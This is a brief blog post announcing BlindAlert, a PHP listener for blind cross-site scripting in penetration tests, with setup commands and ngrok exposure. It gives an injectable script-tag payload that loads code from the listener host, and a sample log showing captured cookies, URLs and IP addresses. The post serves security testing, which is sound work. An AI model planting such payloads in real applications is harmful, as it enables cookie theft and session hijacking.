BlindAlert — Blind Cross Site Script tool

Mukesh Dhama
Feb 11, 2018 · 1 min read

Blind Cross Site Script requires more effort to find out in any application while pentesting. It requires server, where you need to host a tool which is capable of finding out Blind-XSS.

BlindAlert is an easy Blind Cross Site Scripting tool which you can run locally or you can host in server.

Requirements

  • PHP >= 5.7
  • Running server or ngrok (access localhost over the internet)

Installation

Either you can install in your local system and access through the ngrok or install into a live server.

To install BlindAlert, simply clone the repo

git clone https://github.com/mdhama/blindAlert.git

To Run on local server

cd blindAlert
php -S localhost:80

Now open http://localhost in your browser.

Over the internet using ngrok

./ngrok http 80

Uses

  • Create a JS payload and start blindly putting into endpoints :-) e.g. "><script src="http://localhost"></script>
  • When it executes sucessfully, it creates an output file within the same project directory.

Example output file.txt:

origin: http://example
host: example
url: http://example/user/posts
referrer: http://example/user
user-agent: <user-agent>
cookies: <document.cookie>
ip: <ip_addess>

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade